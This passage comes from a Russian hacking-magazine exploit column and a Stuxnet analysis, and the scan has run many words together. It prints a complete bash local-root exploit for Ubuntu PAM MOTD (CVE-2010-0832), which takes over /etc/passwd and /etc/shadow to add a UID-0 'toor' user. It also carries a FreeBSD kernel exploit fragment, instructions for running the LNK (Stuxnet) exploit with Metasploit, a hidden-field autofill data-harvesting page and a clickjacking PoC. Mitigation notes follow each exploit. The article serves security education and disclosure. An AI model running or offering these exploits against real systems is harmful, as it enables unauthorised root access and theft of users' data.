книги хакеры / журнал хакер / 140_Optimized

FreeBSD. Ядроввосторгеотадреса0x61616161. Halt

iov[1].iov_base = FSNAME;

iov[1].iov_len = strlen(iov[1].iov_base) + 1; iov[2].iov_base = "fspath";

iov[2].iov_len = strlen(iov[2].iov_base) + 1; iov[3].iov_base = DIRPATH;

iov[3].iov_len = strlen(iov[3].iov_base) + 1; iov[4].iov_base = "nfs_args";

iov[4].iov_len = strlen(iov[4].iov_base) + 1; iov[5].iov_base = &na;

iov[5].iov_len = sizeof(na);

Далееидетвызов nmount() c указаниемколичествавекторов:

nmount(iov, 6, 0);

Вызов закончится ошибкой, но это уже не имеет значения, так как шеллкод завершил работу в контексте ядра и вернул управление коду эксплойта, который, в свою очередь, просто выполнит exit(). Что же до атакующего, то он теперь стал root'ом, с чем мы его и поздравляем!

SOLUTION

Решений несколько. Во-первых, есть уже FreeBSD 8.1, где уязвимость исправлена, во-вторых, более старые версии не подвержены уязвимости, ну и, в-третьих, по умолчанию права на монтирование есть только у root'а. Так что угроза актуальна для тех, кто выделил данные права и пользователям. Проверить сей факт можно, набрав в консоли:

sysctl vfs.usermount

Еслирезультатненуль, топользователимогутмонтироватьсвоиприбамбасыидажезапускатьданныйэксплойтсцельюполученияUID=0.

02ПОВЫШЕНИЕПРИВИЛЕГИЙВUBUNTU

TARGETS

•Ubuntu 9.10

•Ubuntu 10.04 LTS

CVE

CVE-2010-0832

FreeBSD. Эксплойтвработе. Захватroot’а

BRIEF

ВдистрибутивеОСLinux Ubuntu былаобнаруженасерьезнаяуязвимость, позволяющаялюбомупользователюповыситьсвоипривилегии доroot'а. Вэтомслучаемыговоримуженеопереполнениибуферав ядре, апростооботсутствиипроверокправприсозданиифайла. Какбы невиннонезвучалоописание, нопоследствиявсетеже— захватroot'а.

EXPLOIT

Вовремявходавсистему, например, черезSSH, пользователюпоказываетсяприветствие. Делаетэтомодульpam_motd, которыйзатем создаетфайлmotd.legal-notice вдомашнейдиректориивпапке./cache. Мол, смотрипользователь, чтоятебепоказал... Ноделаетонэтосправамиroot'а, атаккакпользовательнерут, томодульменяетвладельца файланаUID пользователя. Самоевремявспомнитьпросимволические линкив*nix-системах, нокакэтонампоможет? Оченьпросто— давайте удалимпапку.cache издомашнейдиректорииисоздадимсимволическийлинксименем.cache, которыйуказывает, ну, хотябына/etc/shadow.

user@ubuntu1004desktop:~$ rm -rf ~/.cache user@ubuntu1004desktop:~$ ln -s /etc/shadow ~/.cache;

ЗатемзайдемпоSSH наUbuntu сосвоиминикчемнымиправамиюзера. Взглянем, чтожеслучилосьс/etc/shadow:

user@ubuntu1004desktop:~$ ls -l /etc/shadow

-rw-r----- 1 user user 1162 2010-07-25 12:50 /etc/shadow

Ого, мытеперьвладельцы/etc/shadow, анекакой-тотамroot. Аэто значит, чтомыможемчитатьфайливытащитьхешпароля. Номожно сделатьещекруче— записатьтудановыйпароль. Эксплойтнадиске делаетвсевышесказанноеавтоматически: добавляетпользователяtoor вфайлы/etc/passwd и/etc/shadow изаписываетпарольtoor. UID нового пользователяравнонулю, аэтозначитправаroot'а. Делаетонвсеэто аналогичноуказанномуметоду, черезсимволическиелинки. Взглянем накодэксплойта:

#!/bin/bash

#Строчки для добавления в /etc/passwd P='toor:x:0:0:root:/root:/bin/bash'

#... è â /etc/shadow

#в качестве строки — хеш от ‘toor’

S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt 0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX. cI7NQtsNz1:14798:0:99999:7:::'

ВЗЛОМ

echo "[*] Ubuntu PAM MOTD local root"

# Проверки на наличие нужных пакетов

[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1

[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1

[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1

#Процедура сохранения старых файлов backup() {

[ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak [ -e "$1" ] || return 0

mv "$1"{,.bak} || return 1 echo "[*] Backuped $1"

}

#Процедура восстановления старых файлов restore() {

[ -e "$1" ] && rm -rf "$1" [ -e "$1".bak ] || return 0 mv "$1"{.bak,} || return 1 echo "[*] Restored $1"

}

#процедура создания SSH-ключей

key_create() {

backup ~/.ssh/authorized_keys

ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }

# сохраняем публичный ключ в доверенных ключах mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 echo "[*] SSH key set up"

}

#Удаляем доверенные открытые ключи key_remove() {

rm -f "$KEY"

restore ~/.ssh/authorized_keys echo "[*] SSH key removed"

}

#Триггер уязвимости

own() {

[ -e ~/.cache ] && rm -rf ~/.cache

# Создаем линк

ln -s "$1" ~/.cache || return 1 echo "[*] spawn ssh"

# Используя ключ, выполняем SSH-соединение

ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true

[ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }

echo "[+] owned: $1"

}

bye() { key_remove exit 1

}

#Основной код: KEY="$(mktemp -u)"

#Создаем ключи, что бы спокойно юзать SSH без ввода пароля

key_create || { echo "[-] Failed to setup SSH key"; exit 1; }

#Cохраняем старый .cache

backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }

# Атака на /etc/passwd

own /etc/passwd && echo "$P" >> /etc/passwd

# Атака на /etc/shadow

own /etc/shadow && echo "$S" >> /etc/shadow

# Восстанавливаем .cache

restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }

#Удаляем ключи SSH, что нагенерили key_remove

echo "[+] Success! Use password toor to get root"

#Обновляем базы паролей из файлов

#Получаем шелл

#Для этого требуется ввести пароль пользователя toor…

#пароль=toor

su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor

SOLUTION

Существуетпатч, ставимеготак:

user@ubuntu1004desktop:~$ sudo aptitude -y update

Ubuntu. Эксплойтвработе, опятьroot наш…

user@ubuntu1004desktop:~$ sudo aptitude -y install libpam~n~i

03АВТОМАТИЧЕСКИЙЗАПУСККОДАС ПОМОЩЬЮ.LNK-ФАЙЛОВ

TARGETS

•Windows XP

•Windows 2000/2003/2008

•Windows Vista

•Windows 7

CVE

CVE-2010-2568

BRIEF

0day уязвимостьобнаружилиэксперты, изучаяметодраспространения новойзаразы— Win32/Stuxnet, котораябылазаточенаподпромышленныйшпионажисобираладанныесАСУТПсистем(подробнееобэтом читайвотдельнойстатье). Здесьжеярасскажулишьпросамууязвимость. Уязвимостьзаключаетсявтом, чтокаким-томагическимобразом вредоносныйкодизDLL-файлавыполнялсяавтоматическиприоткры- тиифлеш-накопителясэтой DLL’койинекимярлычком...

EXPLOIT

Какжеуязвимостьможетзапускатьпроизвольныйкод, даещеи автоматическичерез.LNK файл? Приоткрытиисодержимогофлешки встандартномвьювере, ярлычкиавтоматическиобрабатываютсядля отображения. Вовремяэтойобработкиоболочкавинды(explorer.exe и shell32.dll) попытаетсязагрузитьиконки. Приэтом, еслитамбудет.LNK с указателемнаэлементконтрольнойпанели(.cpl), обработчикподгрузит этотапплетчерезвызов LoadLibraryW() сцельюобработкииконки из.CPL-файла. Нофишкавтом, чтовтакомярлыкеможноуказатьне путьк.CPL-файлу, а, например, кдинамическойбиблиотеке— .DLL. А, какизвестно, LoadLibraryW() автоматическивызываетизбиблиотекифункцию DllMain(). Каквидно, вседикопросто. Уязвимость архитектурная, таккакэтоне«бага», аскорее«фича». Темнеменее, такие ошибкивсегдасамыеопасные. Злоумышленниксгенерилбиблиотекус вредоноснымкодом, создал.LNK файл, ивсе— автоматическийзалет, ипокруче, чемчерезautorun.inf. ВитогебылвыложенбезвредныйPoC эксплойта, которыйвсеголишьпосылает«дебаг» сообщения, которые можноловитьпрограммойDbgView. Сообщениегласит: «SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!». Какой-тосмыслвофразе, конечно,

LNK. PoC вработе

есть... Темнеменее, ребятаизкомандыMetaSploit показалиэтужеуязвимостьвиномизмерении. Однодело— pwn’итькомпьютеры, втыкая злостныефлешки, исовсемдругое— попытатьсяиспользоватьэту уязвимостьчерезинтернет. Добилисьониэтогозасчетиспользования WebDav, которыйпозволяетиспользоватьфайловыйдоступкресурсупо протоколуHTTP. Инымисловами, создаетсяWebDav-сервиссярлыч- комибиблиотекой, подопытный, используябраузертипаIE, заходит насервериполучаетэтифайлывотображениистандартноговидового просмотрщикадиректорий(explorer.exe). Чтопроисходитпотом— ты ужечиталвыше. Собственнодлятестаобновисвойметасплойт, найди модульэксплутацииуязвимости.lnk, запусти... даженастроекненадо, тольковыберишеллкод, которыйбудетвнедренв.DLL-файл, который подгрузитсяжертвой.

SOLUTION

Официальногопатчапоканет, темнеменее, существуетнесколько шагов, которыеспособныснизитьрискипрактическидонуля. ИсследовательДидьеСтивенс(Didier Stevens) всвоемблогеопубликовалаждве заметкинатемузащитыотданнойнапасти. Во-первых, онпредложил использоватьеготулзу— Ariad [], которойможнозапретитьзапуск и/илизагрузкуисполняемыхфайловсCD-ROM иUSB-диска. Во-вторых, использоватьполитикиограниченияиспользованияпрограмм(SRP). ЭтиполитикипозволяютконтролироватьразличноеПО. Достаточно добавитьполитикутипа«запретитьвсемнеизвестнымПОзапускаться сдисков», иэксплойтбольшенеопасен. ДляэтогоидемвПанельуправления— Администрирование— Локальнаяполитикабезопасности

— Политикиограниченногоиспользованияпрограмм, правойкнопкой— «Добавитьновуюполитику». Далеевыбираемдополнительные правилаиправойкнопкойдобавляемправилодляпути. Вбиваембукву используемогодиска, уровень— неограниченный. Послеэтогоопять идемнауровеньвышеивыбираем параметр«Принудительный». Там необходимоуказать, чтоэтиправиланетолькодля.exe, новообщедля всехисполняемыхфайлов. Послеэтоговыбираемуровнибезопасности иставимна«Неразрешено», какправилопоумолчанию.

04АВТОЗАПОЛНЕНИЕФОРМВБРАУЗЕРЕ

SAFARI

TARGETS

•Safari 4

•Safari 5

CVE

N/A

BRIEF

Продолжаемплавнопереходитьот*nix кWindows, иот«баг» к«фичам». ДжеремиГроссман(Jeremiah Grossman), известныйисследователь,

ВЗЛОМ

LNK. Metasploit даетнамшелл

показалнамстобою, какуюопасностьтаят«модныеиудобныефишки». Никтонеспорит, чтоавтозаполнениевбраузерепривноситвнаш, погрязшийвненавистиилжи, мирлучикнадеждыначто-тохорошее, но всежестоитпонимать, чтовсякаяавтоматизацияпотенциальноопасна, икогда-нибудькомпьютерыпростоубьютвсехлюдей:).

EXPLOIT

Чтотакоеавтозаполнение? Этокогдатебеленькаждыйразписатьсвой хаксорский«никнэйм» илиадрес электронногоящика, иумный, услужливыйбраузерсам, попамяти, дописываетнужныебайтикивeditbox.

СоздателиSafari пошлиещедальше— ониберутвсюинфупрямоиз твоейкарточки, чтовадреснойкниге(ктовообщеимипользуется?). Вот дочеготехникадошла! НозоркийглазГроссманаобратилвниманиена то, чтопослеавтозаполненияполясопределеннымID, атакжеостальныеполязаполняютсясами. Круто! Ноеслипредставить, чтоэтиполя скрыты? Тотыдаженезаметишь, чтоонизаполнилисьчем-то, чтоты ужевводил. Этоможетвыглядетьтак: насайтетебяпросятввеститолько имя, тырадостноначинаешьвводить, туттебепомогаетавтозаполнение

— тыегоподтверждаешьиотсылаешьформу, гдетыуказалтолькоимя. Новскрытыхформахзаполнилосьбольшеинфы, чемтогохотелось, например, адрес, странаиэлектронныйящик. Ивсеэтопослалоськуда-то там, исовершеннобезтвоеговедома. Примертакогоэксплойта:

<html>

<head>

<meta http-equiv="Content-Type" content="text/ html; charset=utf-8" />

<title>

Settings - Profile - brightkite.com </title>

</head>

<body>

<form action="http://localhost/" method="get"> <label for="fullname">Full name</label> <input id="fullname" name="fullname" /> <input type="submit" />

<input id="street" name="street" style="opacity:0"/>

<input id="e-mail" name="e-mail" style="opacity:0"/>

</form>

</body>

</html>

Clickjacking. Вродессылкаведеткуданадо…

Соответственно, виднотолькополедлявводаФИО. Остальноекакбыне видно, нотожеявляетсячастьюформыиподверженоавтозаполнению. Приотправкеформыуказанныепараметрыбудутотображенывадреснойстроке(тактутунасметодGET).

SOLUTION

ГроссмансообщилApple опроблеме, но, поегословам, тепростотихо проигнорировалисейфакт, такчтопатчанет. Ксчастьюпроблема решаетсяпросто— отключениемавтозаполнения.

05CLICKJACKING ВБРАУЗЕРАХ

TARGETS

•Firefox 3.6.7

•Netscape 9.0.0.6

•Opera 10.60

•Safari 4.0.2

•SeaMonkey 2.0.6

CVE

N/A

BRIEF

Идобиваябраузернуютему, расскажуоClickjacking. ТотсамыйГроссман рассказывалвпервыеоданнойатакедвагоданазад, итеперь, спустя двагода, современныебраузерыполучаютсвоюдолюэксплойтов. ИранскиехакерыизSecuritylab.ir влицеПойаДанешманда(Pouya Daneshmand) опубликовалинесколько эксплойтовнаданнуютемудля различныхбраузеров. АчтотакоеClickjacking? Аэтокогдапользователь кликаетпоссылкеА, аегопокакой-топричинекидаетнассылкуБ. То естьэтонекаяобманка, котораяпозволяетзапудритжертвемозги(или глаза).

EXPLOIT

ЭксплойтвыглядиткакобычнаяHTML-страничка. Приееоткрытии виднассылканаиранскийсайт, еслинавестимышкойнассылку, то встатуснойстрокечеткоотпишетсяимяэтогосамогосайта. Вроде

никакогоподвоха. Затокогдакликнешьпоссылке, браузеридетсовсем надругойсайт. Какэтореализовано— сейчасипосмотрим. Разбиратья будуэксплойтдляFireFox, таккакданныйбраузернаиболеепопулярену менядома. СобственнотекстHTML:

<html><head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">

Clickjacking. Новотбраузеридетявнонепоссылке

Autofill. Браузерявноговоритлишнее

<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</ title>

</head><body>

<div id="mydiv" onmouseover="document.location='http:// www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div> <script>

function clickjack_armor(evt)

{

clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX; clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.

left=clickjack_mouseX-1; document.getElementById('mydiv').style.

top=clickjack_mouseY-1;

}

</script>

<center>

<br>

<center><h1><font face="Calibri">Firefox 3.6.7 /

SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1> <p> </p>

<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">

<b><br><br>

<a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go

to the http://www.Securitylab.ir : (http://www. mozilla.org)</a></b></div>

<div style="border-bottom-style: solid; border-bottom- width: 1px; padding-bottom: 1px">

<p> </div> <p> </p> </center>

<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">

<b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>

</center></body></html>

Первымделомобратимвниманиенамалюсенькийслой«mydiv». Данныйслойбудетвверхнемлевомуглубраузера, и, каквидноизего свойств, принаведениимышкинаэтотслойбраузерсделаетредирект насайтразработчикабраузера. Вцентрежеестьссылка, ноприклике стоитсобытиенавызовфункции clickjack_armor(). Принаведении будетуказыватьсяссылканаиранскийсайт. Функция clickjack_ armor() меняетразмерыслоя«mydiv» подкоординатымышки, что автоматическизапускаетсобытиеслояonmouseover игрузитсясайт Мозиллы. Витогедляпользователяэтовыглядит, какеслибыонкликнул наодинсайт— иранский, апопалнадругой— Мозиллы. Воттакиедела. Мненеоченьпонятно, зачемтакхитрить, еслижертвауженатвоейвебстранице, но, темнеменее, уязвимостьимеетместобыть.

SOLUTION

Большинствобраузеровизбавленыотданнойпроблемывсвоихпоследнихверсиях. Вообще, чтокасаетсябраузеров— лучшепроверять обновлениячутьлинекаждыйдень, и, есличто, сразуобновлять. z

ВЗЛОМ

Алексей Синцов Digital Security a.sintsov@dsec.ru

ПРОМЫШЛЕННЫЙ ШПИОНАЖ

Мы привыкли, что киберпреступность пытается обмануть, взломать

иобворовать несчастных пользователей интернета. Но время всегда заставляет людей двигаться дальше, за новыми результатами

иновой прибылью. То же самое происходит и в отношении плохих парней. Можно еще с десяток лет строить ботнеты, воровать номера CC, но ведь есть еще огромная неизведанная ниша — промышленность, ее технологии, секреты и ценные данные. Именно с ней и произошел инцидент в разгар лета — беспрецедентная атака на промышленные системы SCADA, Supervisory Control And Data Acquisition, что переводится как «Диспетчерское Управление и Сбор Данных» (по-нашему это аналог АСУ ТП — Автоматизированная Система Управления Технологическим Процессом). Такие системы контролируют процессы на производстве, нефтяных вышках, атомных электростанциях, газопроводах и т.д. Естественно, такие комплексы имеют свои базы данных, и та информация, что в этих базах, бесценна. Именно на эту информацию и нацелилась свежая вредоносная программа, получившая имя Stuxnet.

STUXNET

Первыми обнаружили нового зверя братья-славяне из Белоруссии, а именно — антивирусная контора VirusBlokAda. 17 июня ими было найдено тело виря, но лишь к 10 июля они выпустили пресс-релиз (объясняя это тем, что им было необходимо уведомить компании, чье имя было в ходе дела «опорочено», и изучить экземпляр). Компании эти достаточно известны — Microsoft и Realtek. Специалисты VirusBlokAda зафиксировали использование червем 0day-уязвимости при обработке файлов ярлыков (.lnk), и поэтому в дело оказались вмешаны Microsoft (о самой уязвимости поговорим позже). А вот при чем тут Realtek? Дело в том, что устанавливаемые червем драйвера имели действующий сертификат, заверенный Verisign и выданный на имя Realtek. Такой оборот дела сильно усложняет процесс детектирования вредоносного контента различными системами обнаружения и предотвращения вторжения на уровне хоста (HIPS, антируткиты), так как такие системы безгранично доверяют сертификатам, не обращая внимания на суть дела. Я вполне уверен, что доверенный сертификат сильно

Siemens подтверждает факт проникновения в SCADA

продлил жизнь «малваре», прежде, чем ее обнаружили. Как бы то ни было, после пресс-релиза белорусов, другие антивирусные компании так же подключились к исследованию, как новой уязвимости, с помощью которой распространялся червь, так и к боевой нагрузке.

РАСПРОСТРАНЕНИЕ

Механизм размножения червя, казалось бы, не особо-то и оригинальный — через USB-флешки. Но autorun.inf тут уже ни при чем. В дело вступает новая уязвимость, которая позволяет загружать произвольную .DLL-библиотеку, как только флешка будет вставлена, и пользователь откроет ее содержимое. Дело в том, что на флешке лежит .DLL-файл с вредоносным кодом (ну, фактически расширение, в случае с червем, — .TMP) и .LNK-файл. Файл

с расширением .LNK является обычным ярлыком. Но в нашей ситуации ярлык не совсем обычный. При отображении ярлычка в стандартной оболочке или Total Commander автоматически выполнится лежащий рядом .DLL-файл со всеми вытекающими отсюда последствиями! Как такое могло произойти? Как известно, ярлык указывает на исполняемый файл и при двойном щелчке вызывает его. Но тут все без щелчков, да и .DLL-файл так не выполнить. Если рассмотреть ярлык в HEX-редакторе, можно увидеть, что в его середине указан путь до нашей .DLL. Кроме того, это не обычный ярлычок, а ярлычок на элемент панели управления! Эта-то деталь все и объясняет. Любой элемент панели управления — .CPL- апплет. Но CPL — это, по сути, простая .DLL, поэтому ярлык для панели управления особый, он как бы понимает, что имеет дело с

.DLL. Кроме того, такой ярлык пытается ВЫТАЩИТЬ иконку из.DLL, чтобы отобразить ее в проводнике. Но для того, чтобы вытащить иконку, надо подгрузить библиотеку. Что, собственно, оболочка и делает с помощью вызова LoadLibraryW().

Справедливости ради стоит отметить, что вызов этой функции автоматически влечет за собой выполнение функции DllMain() из подгружаемой библиотеки. Поэтому, если такой ярлычок будет указывать не на .CPL-апплет, а на злую библиотеку со злым кодом (в функции DllMain()), то код выполнится АВТОМАТИЧЕСКИ при просмотре иконки ярлыка. Кроме того, эту уязвимость можно использовать и с помощью .PIF-ярлыков.

БОЕВАЯ НАГРУЗКА

Кроме интересного метода распространения удивила и боевая нагрузка — никаких ботнетов, краж банковских паролей, номеров

Symantec расписывает компоненты трояна

CC. Все оказалось куда масштабнее. Уязвимость .LNK провоцирует загрузку скрытого файла с именем ~wtr4141.tmp, лежащего рядом с ярлыком. Файл этот исполняемый, но маленький (всего 25 Кб).

Как отметили специалисты из Symantec, очень важно на первых порах скрыть свое присутствие, пока система еще не заражена. С учетом специфики 0day-уязвимости, которая действует, как только пользователь увидит иконки, сработает и ~wtr4141.tmp, который в первую очередь вешает перехваты системных вызовов в kernel32. dll. Перехватываемые вызовы:

•FindFirstFileW

•FindNextFileW

•FindFirstFileExW

Хуки также вешаются и на некоторые функции из ntdll.dll:

•NtQueryDirectoryFile

•ZwQueryDirectoryFile

Все эти функции обрабатываются со следующей логикой — если файл начинается с «~wtr» и заканчивается на «.tmp» (или на «.lnk»), то удалить его из возвращенного оригинальной функцией значения, а затем вернуть, что осталось. Другими словами, скрыть свое присутствие на диске. Поэтому пользователь просто не увидит файлы на флешке. После этого ~wtr4141.tmp подгружает второй файл с диска (~wtr4132.tmp). Делает он это не совсем стандартно, я бы даже сказал, извращенно — установкой хуков в ntdll.dll на вызовы:

•ZwMapViewOfSection

•ZwCreateSection

•ZwOpenFile

•ZwCloseFile

•ZwQueryAttributesFile

•ZwQuerySection

Затем с помощью вызова LoadLibrary он пытается подгрузить несуществующий файл со специальным именем, на это дело

ВЗЛОМ